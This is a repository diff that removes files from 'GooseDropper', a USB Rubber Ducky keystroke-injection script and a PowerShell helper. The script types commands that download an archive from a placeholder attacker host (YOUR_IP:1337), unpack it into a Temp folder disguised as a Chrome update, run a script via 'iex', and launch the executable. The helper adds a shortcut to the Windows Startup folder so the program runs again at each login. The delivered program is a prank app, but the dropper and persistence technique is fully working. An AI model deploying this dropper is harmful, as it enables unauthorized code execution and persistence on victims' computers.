Dropper v2.0

Duckyscripts/GooseDropper/testing/GooseDropper.txt.bk

@@ -1,23 +0,0 @@
-REM TITLE GooseDropper
-REM AUTHOR Fr3ki
-REM DESCRIPTION Grab the Desktop Goose executable from an attacker machine and run it on the victim PC
-DELAY 500
-GUI r
-DELAY 500
-STRING powershell wget YOUR_IP:1337 -OutFile $ENV:Temp/Updater.zip
-ENTER
-DELAY 8000
-GUI r
-DELAY 500
-STRING powershell Expand-Archive $ENV:Temp\Updater.zip -DestinationPath $ENV:Temp\Chrome_Update
-ENTER
-DELAY 3000
-GUI r
-DELAY 500
-STRING powershell gc $env:Temp\Chrome_Update\Update\PersistentGoose.ps1 | iex
-ENTER
-DELAY 1000
-GUI r
-DELAY 500
-STRING %Temp%\Chrome_Update\Update\GooseDesktop.exe
-ENTER

Duckyscripts/GooseDropper/testing/PersistentGoose.ps1.bk

@@ -1,6 +0,0 @@
-$WScriptShell = New-Object -ComObject WScript.Shell
-$TargetFile = "$env:Temp\Chrome_Update\Update\GooseDesktop.exe"
-$ShortcutFile = "C:\Users\$env:UserName\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HONK.lnk"
-$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
-$Shortcut.TargetPath = $TargetFile
-$Shortcut.Save()

Duckyscripts/GooseDropper/testing/recover.sh

@@ -1,6 +0,0 @@
-#!/bin/bash
-
-cp PersistentGoose.ps1.bk PersistentGoose.ps1
-cp "bk_Desktop Goose v0.31.zip" "Desktop Goose v0.31.zip"
-cp GooseDropper.txt.bk GooseDropper.txt
-rm Chrome_Update.zip